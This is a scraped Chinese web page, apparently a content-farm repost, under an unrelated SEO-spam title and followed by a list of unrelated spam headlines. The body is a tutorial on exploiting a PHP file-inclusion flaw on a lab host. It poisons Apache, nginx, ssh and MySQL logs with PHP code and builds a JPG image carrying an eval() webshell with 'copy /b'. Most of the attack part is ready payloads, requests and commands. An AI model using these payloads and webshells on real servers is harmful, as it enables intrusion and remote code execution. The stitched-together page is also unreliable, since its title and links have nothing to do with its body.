当前位置: 首页 > news >正文

全国各城市感染高峰进度查询宁波网站建设seo

全国各城市感染高峰进度查询,宁波网站建设seo,提供图片做网站的要求,免费logo设计图案日志利用, 图片木马利用 一, 利用服务器日志 通过普通的网络请求向日志文件注入代码, 再利用文件包含漏洞执行日志中的代码段. apache log: /opt/lampp/logs/access_log nginx log: /usr/local/nginx/logs/access.log 首先可以利用文件包含漏洞测试日志文件的内容是否可以显…日志利用, 图片木马利用 一, 利用服务器日志 通过普通的网络请求向日志文件注入代码, 再利用文件包含漏洞执行日志中的代码段. apache log: /opt/lampp/logs/access_log nginx log: /usr/local/nginx/logs/access.log 首先可以利用文件包含漏洞测试日志文件的内容是否可以显示. 实际情况下日志的路径和名称都可能被修改, 需要其他手段获取. http://192.168.112.200/security/fileinc.php?filename/opt/lampp/logs/access_log http://192.168.112.200/security/fileinc.php?filename/opt/lampp/logs/error_log由于日志会记录请求的url, 如果发送的url中带有恶意代码, 那么日志文件access_log就会记录, 再使用文件包含漏洞包含日志文件来执行代码. http://192.168.112.200/security/fileinc.php?php phpinfo(); ?查看access_log日志: [25/Oct/2023:09:57:53 0800] GET /security/fileinc.php%3C?php%20phpinfo();%20?%3E HTTP/1.1这里可以看到符号被浏览器转码了, 因此无法执行代码. 那么我们绕过浏览器来发送这个请求, 例如使用 burpsuite. 方式1: 不使用双引号, 需要去掉php和空格. GET /security/fileinc.php?phpinfo();? HTTP/1.1查看access_log日志: [25/Oct/2023:10:26:31 0800] GET /security/fileinc.php?phpinfo();? HTTP/1.1 404 1033这里看到代码已经顺利写入了, 那么利用文件包含来执行代码: http://192.168.112.200/security/fileinc.php?filename/opt/lampp/logs/access_log方式2: 使用双引号, 好处是可以包含更复杂的代码. GET /security/fileinc.php?php eval($_POST[cmd]);? HTTP/1.1查看access_log日志: [25/Oct/2023:10:44:15 0800] GET /security/fileinc.php\?php eval($_POST[cmd]);?\ 400 961利用漏洞: http://192.168.112.200/security/fileinc.php?filename/opt/lampp/logs/access_logpost data: cmdphpinfo();二, 利用ssh或mysql的登录日志 1. linux默认的登录日志: /var/log/secure日志文件对其他用户有可读权限 正常登录: ssh root192.168.112.200因为ssh的登录日志中会记录发送的用户名, 那么将用户名替换成恶意代码来登录: ssh ?phpinfo();?192.168.112.200查看日志: Oct 25 11:15:13 mycentos sshd[16208]: Invalid user ?phpinfo();? from 192.168.112.1 port 14605 Oct 25 11:15:13 mycentos sshd[16208]: input_userauth_request: invalid user ?phpinfo();? [preauth]这里可以看到代码已经注入到日志中了, 接下来利用文件包含漏洞执行代码: http://192.168.112.200/security/fileinc.php?filename/var/log/secure2. mysql的登录日志 原理与ssh日志利用一样. mysql日志默认是关闭的. 需要mysql日志是开启状态 /opt/lampp/etc/my.cnf: general_logON general_log_file/opt/lampp/logs/mysql.log log_outputfile日志文件对其他用户有可读权限 假设日志的路径: /opt/lampp/logs/mysql.log正常登录: mysql -u root -p -h 192.168.112.200将用户名替换成恶意代码: mysql -u ?phpinfo();? -p -h 192.168.112.200利用文件包含漏洞执行代码: http://192.168.112.200/security/fileinc.php?filename/opt/lampp/logs/mysql.log3. 图片木马 准备图片和php文件, 使用cmd中的copy命令合并. 例如: mm.php文件: ?php eval($_GET[cmd]); ?命令: copy src.jpg/b mm.php/a p_mm.jpg以上命令将src.jpg与mm.php合并, 生成图片p_mm.jpg 将木马图片上传到服务器, 利用文件包含漏洞执行代码: http://192.168.112.200/security/fileinc.php?filenameimage/p_mm.jpgcmdphpinfo();
http://www.hkea.cn/news/14280773/

相关文章:

  • 竞价托管网站建设自己开网店没有货源怎么办
  • 三好街做网站公司网站制作长春
  • php响应式网站开发百度云外贸网站建设论坛
  • seo整站优化公司持续监控百度的链接
  • 厦网站建设培训学校wordpress简约博客主题
  • 威海 医院网站建设商品详情页设计模板
  • 响应式网站 价格产品推广计划
  • intitle 郑州网站建设网站开发和程序开发
  • 扬州网站商城建设价格信息免费发布平台
  • 中国建设银行手机网站下载安装用模板做网站需要懂代码吗
  • wordpress淘宝客网站模板网站建设价表模板
  • 哈尔滨网页设计网站模板免费html5网站源码
  • 在网站上做网络课堂软件多少钱怎么开店
  • 家政网站制作线上线下相结合的营销模式
  • 网站域名费用怎么做帐爱获客电销系统
  • 网站系统建设预算国内专业网站设计
  • 怎样做电影网站模型网站大全免费
  • 服务好的企业网站怎么建设it渠道网
  • 关于集团网站建设的修改请示上海巨型网站建设
  • 网站搜索功能如何实现做平面设计兼职的网站
  • 个人建设网站程序青海西宁网站建设
  • 网站建设电话销售开场白wordpress venue
  • 常见网站结构网站游戏网站怎么做
  • 西安网站优化效果terrytao wordpress
  • 制作一个网站人才招聘网网站策划方案
  • 原材料价格查询网站有什么做衣服的网站吗
  • 网站建设 问答wordpress页面回收站位置
  • 设计企业网站如何制作网站地图
  • 网站的建设期破解要钱网站
  • 网站功能建设湛江建设网官方网站